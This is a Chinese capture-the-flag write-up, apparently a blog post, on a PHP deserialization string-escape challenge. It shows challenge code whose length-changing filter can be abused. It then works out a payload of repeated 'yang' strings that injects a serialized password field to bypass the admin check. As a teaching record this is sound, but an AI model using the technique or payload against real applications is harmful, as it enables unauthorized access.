cs反序列化2

cs反序列化2

http://111.229.84.70:9998/

<?php
highlight_file(__FILE__);
class HZNU{
    private $username;
    private $password;
    
    public function __construct($user,$pass){
        $this->username=$user;
        $this->password=$pass;
    }
    
    public function login(){
        if ($this->password==='admin'){
            include 'flag.php';
            echo $flag;
        }
    }
}
function filter($str){
    return str_replace('yang','jiang',$str);//当正则到yang时长度加一
}
$username=$_GET['user'];
$password=$_GET['pass'];
if(preg_match('/admin/',$password)){
    die('你在想屁吃');
}
$a=new HZNU($username,$password);
$s=filter(serialize($a));//序列化a再正则替换
$b=unserialize($s);//再反序列化
$b->login();
?>

get:user和pass两个值,pass不为admin,处理后pass=admin,那么构建反序列化逃逸

private属性序列化之后是这个样子(%00算一个长度)

O:4:"HZNU":2:{s:14:"%00HZNU%00username";s:3:"xxx";s:14:"%00HZNU%00password";s:5:"admin";}

要把后面37个字符挤出去,就需要37个yang

O:4:"HZNU":2:{s:14:"%00HZNU%00username";s:173:"yangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyang";s:14:"%00HZNU%00password";s:5:"admin";}";}

正则替换之后

O:4:"HZNU":2:{s:14:"%00HZNU%00username";s:173:"jiangjiangjiangjiangjiangjiangjiangjiangjiangjiangjiangjiangjiangjiangjiangjiangjiangjiangjiangjiangjiangjiangjiangjiangjiangjiangjiangjiangjiangjiangjiangjiangjiangjiangjiangjiangjiang";s:14:"%00HZNU%00password";s:5:"admin";}";}

这样就以假乱真了,所以payload

?user=yangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyang";s:14:"%00HZNU%00password";s:5:"admin";}&pass=666

在这里插入图片描述

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值